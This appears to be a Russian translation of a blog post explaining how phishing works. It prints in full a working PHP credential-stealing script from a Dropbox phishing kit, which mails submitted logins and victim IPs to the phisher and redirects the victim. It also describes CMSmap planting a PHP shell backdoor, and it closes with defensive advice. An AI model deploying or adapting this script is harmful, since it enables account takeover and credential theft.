Фишинг: что это такое и как можно защититься от него

 

Фишинг — это метод социальной инженерии, при которой злоумышленник подталкивает простых пользователей, выдать свои данные. Зачастую это хорошо скопированные веб-сайты или формы для ввода данных.

Хотите верьте, хотите — нет, но фишинг по сей день у хакеров пользуется популярностью. К тому же, как правило он хорошо исполнен, но отличить подделку от оригинала все же можно…

Цель данного поста — пролить свет на то, как работает фишинг. Показать, какие методы фишинга используются для кражи учетных данных. Ну и конечно дать советы о том, как защититься от них.

Принцип работы фишинга

Принцип работы фишинга

Как видно на схеме выше, цикл фишинга можно разбить на 5 отдельных фаз:

  1. Фишер находит уязвимый сайт и загружает на него свой скрипт. Обычно это хорошо скопированная форма входа известных сайтов таких как: Google, Facebook, Dropbox.
  2. Фишер заманивает свою жертву на поддельную страницу входа, отправляя электронные письма. Например, он может попросить войти в систему, чтобы получить бесплатный бонус, увеличить квоту или рассмотреть какую-то проблему.
  3. Жертва заходит на фишинговую страницу, вводит свой логин и пароль. Эти учетные данные обрабатываются PHP скриптом, который перенаправляет ничего не подозревающих пользователей на реальный сайт.
  4. PHP скрипт отправляет украденные учетные данные на адрес электронной почты, который принадлежит фишеру.
  5. Фишер получает уведомление о том, что электронное письмо находится в его почтовом ящике, он входит в систему, получает украденные учетные данные и захватывает учетную запись жертвы.

Вот такой нехитрый способ, который работает уже довольно давно.

Пример фишингового PHP скрипта

Фишинговый скрипт, как упоминалось выше, напоминает хорошую копию страницы входа на целевой веб-сайт. Она модифицируется таким образом, что элемент HTML-формы изменяется для отправки введенных на странице учетных данных в сценарий кражи учетных данных, контролируемый злоумышленником.

Я извлек скрипт кражи учетных данных, показанный ниже, предназначенного для DropBox. Как видите, код очень прост:

<?php

$ip = $_SERVER['REMOTE_ADDR'];
$time = date("m-d-Y g:i:a");

$msg = "---------------------------------------------------------------------------\n";
$msg .= "Dropbox Login Info by ogaranya\n";
$msg .= "---------------------------------------------------------------------------\n";
$msg .= "Email : ".$_POST['username']."\n";
$msg .= "Password : ".$_POST['password']."\n";
$msg .= "---------------------------------------------------------------------------\n";
$msg .= "Sent from $ip on $time\n";
$msg .= "---------------------------------------------------------------------------\n";

$to = "[email protected]";
$subject = "Dr0pB0x Update $ip";
$from = "From: [email protected]";
mail($to,$subject,$msg,$from);
header("Location: http://www.dropbox.com");
?>

Несмотря на свою простоту, здесь есть несколько интересных строк:

  1. Фишер записывает IP-адрес жертвы (строка 3). Я считаю, что это используется по двум причинам. Первая — фишеры используют его, чтобы узнать, какой прокси использовать, чтобы IP-адрес, был аналогичный тому, который обычно используется жертвой. Это сделано для того, чтобы уменьшить риск быть пойманным при анализе входа в систему, проводимом крупными онлайн-сайтами. Во-вторых, это может быть использовано фишерами, чтобы узнать, был ли их набор для фишинга обнаружен различными антифишинговыми системами, так как их IP-адреса сканирования обычно хорошо известны.
  2. В строке 7 информация добавляется в электронное письмо. Это дополнение, подтверждает, что фишеры склонны делиться / повторно использовать фишинговые скрипты. Трудно сказать, где / как они обмениваются этими данными, поскольку это не делается в открытую (например, поиск ogaranya в Google не даст ничего значимого).
  3. После отправки учетных данных фишерам (строка 19) скрипт перенаправляет жертву на реальный сайт (https://www.dropbox.com). Это делается чтобы пользователь ничего не заподозрил.

Этот пример скрипта очень прост, в реальных усовиях фишеры используют куда более сложные решения.

Где фишеры размещают свои фишинговые страницы?

В течение долгого времени у меня было сильное подозрение, что фишеры находят сайты для размещения своих скриптов, используя какие-то сканеры уязвимостей, которые также работают на взломанных сайтах.

Несколько недель назад я обнаружил взломанные сайты, на которых был установлен CMSmap.

CMSmap на странице плагинов WordPress

CMSmap — это сканер с открытым исходным кодом, разработанный для проверки безопасности CMS, включая WordPress и Joomla. У этого сканера есть свойство автоматически устанавливать бэкдор, PHP-оболочку как плагин WordPress, когда он успешно использует уязвимость (см. Скриншот выше). Такой бэкдор позволяет фишерам легко устанавливать свои скрипты и использовать сервер для сканирования Интернета на предмет более уязвимых сайтов.

Как защититься от фишинга?

На месте просто пользователя

Для простого пользователя лучшей защитой от фишинга станет двухфакторная аутентификация. Стоит использовать дополнительную защиту, такую как: подтверждение по SMS, e-num либо Google Authenticator. Таким образом, даже если вы попались на удочку фишинга, ваши ключевые учетные записи в безопасности. Также обновляйте информацию, чтобы сайты могли вернуть вашу учетную запись в случае взлома. Например, вы можете проверить информацию о восстановлении для Google здесь и Twitter здесь.

Также не стоит использовать один пароль для всех сайтов. Использование менеджера паролей, такого как LastPass, облегчит вашу жизнь. Наличие отдельного пароля для каждого веб-сайта гарантирует, что если одна из ваших учетных записей будет взломана (например, из-за фишинга или утечки данных), другая будет в безопасности.

Наконец, при получении электронного письма убедитесь, что домен отправителя реален (например, [email protected]). Фишеры могут выдать себя за представителей большинства известных сайтов. Поэтому просмотр домена отправителя может вам помочь.

На месте вебмастера

Если вы веб-мастер: обновляйте свою CMS (WordPress, Joomla, Drupal), чтобы избежать компрометации. Используйте инструменты веб-мастера Google, чтобы получать уведомления о взломе вашего сайта. В качестве дополнительной меры предосторожности, если вам это не нужно, отключите функцию php mail () или заблокируйте отправку электронной почты с вашего сервера.

Если у вас есть подозрение на взлом, ищите zip-файлы в вашем веб-каталоге.

find .| grep zip

CMSMAP также легко обнаружить, поэтому проверяйте страницу плагинов, если у вас вордпресс. Вот такой фишинг, как он есть…

Источник: How Phishing Works

Перевод: Stupidnet.ru

Bookmark(0)
Если вам понравилась статья, поделитесь ей, где вам удобно:
Социальная инженерия: как можно легко получить доступ к чужому аккаунту
Самый быстрый способ: как настроить VPN на компьютере (на примере ZoogVPN)
null
Здесь подписка по почте:

Для подписки нужен только e-mail:

null
Ключевые слова, по которым возможно наткнуться на этот поток мыслей:

1 комментарий. Оставить новый

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *

Заполните поле
Заполните поле
Пожалуйста, введите корректный адрес email.
Вы должны согласиться с условиями для продолжения

Не пропустите похожие статьи
Меню